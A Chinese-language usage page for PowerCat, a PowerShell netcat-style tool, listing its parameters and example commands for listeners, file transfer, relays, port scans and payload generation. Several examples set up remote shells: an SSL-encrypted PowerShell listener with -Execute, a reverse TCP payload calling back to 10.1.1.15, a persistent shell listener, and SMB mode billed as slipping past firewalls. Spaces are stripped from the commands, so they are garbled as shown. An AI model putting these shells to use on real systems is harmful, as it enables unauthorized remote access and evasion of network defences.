powershell专用网络工具(PowerCat)

PowerCat基本功能和参数

Start-PowerCat#Startsalistener/server.常用软件运行库（vb、vc等）

-Mode     #DefaultstoTcp,canalsospecifyUdporSmb.

-Port     #Theporttolistenon.

-PipeName   #Nameofpipetolistenon.

-SslCn     #CommonnameforSslencryptingTcp.

-Relay     #Format:"<Mode>:<Port/PipeName>"

-Execute    #Executeaconsoleprocessorpowershell.

-SendFile   #Filepathoffiletosend.

-ReceiveFile  #Filepathoffiletobewritten.

-Disconnect  #Disconnectafterconnecting.

-KeepAlive   #Restartafterdisconnecting.

-Timeout    #Timeoutoption.Default:60seconds

Connect-PowerCat#Connectsaclienttoalistener/server.

-Mode     #DefaultstoTcp,canalsospecifyUdporSmb

-RemoteIp   #IPv4addressofhosttoconnectto.

-Port     #Theporttoconnectto.

-PipeName   #Nameofpipetoconnectto.

-SslCn     #CommonnameforSslencryptingTcp.

-Relay     #Format:"<Mode>:<IP>:<Port/PipeName>"

-Execute    #Executeaconsoleprocessorpowershell.

-SendFile   #Filepathoffiletosend.

-ReceiveFile  #Filepathoffiletobewritten.

-Disconnect  #Disconnectafterconnecting.

-Timeout    #Timeoutoption.Default:60seconds

PowerCat是PowerShell的TCP/IP瑞士军刀，适用于Netcat&Ncat.。如果你想在powershell上连SSH或者搭建网络环境，那么PowerCat绝对必不可少！欢迎下载！

PowerCat怎么用

powercat实际上是一个powershell的函数，当你第一次使用它的时候你需要运行脚本来加载这个函数。

由于windows默认不允许任何脚本运行，你需要输入Set-ExecutionPolicyRemoteSigned来允许运行本地的脚本。

PowerCatPowerShell模块打包。你必须导入模块使用其功能。

#Importthefunctionsviathepsd1file:

Import-ModulePowerCat.psd1

默认情况下,PowerCat使用TCP和读取/写入控制台。

#BasicListener:

Start-PowerCat-Port443

#BasicClient:

Connect-PowerCat-RemoteIp10.1.1.1-Port443

文件传输

使用sendfilePowerCat可以用来传输文件和-ReceiveFile参数。

#SendFile:

Connect-PowerCat-RemoteIp10.1.1.1-Port443-SendFileC:pathtoinputfile

#ReceiveFile:

Start-PowerCat-Port443-ReceiveFileC:pathtooutputfile

UDP和SMB

PowerCat支持多通过TCP发送数据。

#SendDataOverUDP:

Start-PowerCat-ModeUdp-Port8000

#SendDataOverSMB(easilysneakpastfirewalls):

Start-PowerCat-ModeSmb-PipeNamePowerCat

SSL

PowerCat动态生成提供SSL加密的X509证书TCP连接。

#Adminprivilegesarerequiredtogeneratetheself-signedcertificate.

#ServeanSSL-Encrypted(Power)Shell:

Start-PowerCat-ModeTcp-Port80-SslCn<CertificateCommonName>-Execute

#ConnecttoanSSLencryptedNcatlistener:

#Setup*nixwithopenssl&Ncat:

#opensslreq-X509-newkeyrsa:2048-subj/CN=PowerCat-days90-keyoutkey.pem-outcert.pem

#ncat-l-p80--ssl--ssl-certcert.pem--ssl-keykey.pem

Connect-PowerCat-ModeTcp-RemoteIp10.1.1.1-Port80-SslCnPowerCat

继电器

PowerCat类似于netcat继电器继电器,但你不需要创建一个文件或启动一个进程。你也可以传递不同协议之间的数据连接。

#UDPListenertoTCPClientRelay:

Start-PowerCat-ModeUdp-Port8000-Relaytcp:10.1.1.16:443

#TCPListenertoUDPClientRelay:

Start-PowerCat-Port8000-Relayudp:10.1.1.16:53

#TCPClienttoClientRelay

Connect-PowerCat-RemoteIp10.1.1.1-Port9000-Relaytcp:10.1.1.16:443

#TCPListenertoSMBListenerRelay

New-PowerCat-Listener-Port8000-Relaysmb:PowerCat

生成的有效载荷

载荷可以使用New-PowerCatPayload函数生成。

#Generateareversetcppayloadthatconnectsbackto10.1.1.15port443:

New-PowerCatPayload-RemoteIp10.1.1.15-Port443-Execute

#Generateatcppayloadthatlistensonport8000:

New-PowerCatPayload-Listener-Port8000-Execute

Misc用法

PowerCat还可以执行端口扫描,开始持续的听众,或作为一个简单的web服务器。

#BasicTCPportscan:

1..1024|ForEach-Object{Connect-PowerCat-RemoteIp10.1.1.10-Port$_-Timeout1-Verbose-Disconnect}

#BasicUDPportscan:

1..1024|ForEach-Object{Connect-PowerCat-ModeUdp-RemoteIp10.1.1.10-Port$_-Timeout1-Verbose}

#Persistentlistener:

Start-PowerCat-Port443-Execute-KeepAlive

#SimpleWebServer:

Start-PowerCat-Port80-SendFileindex.html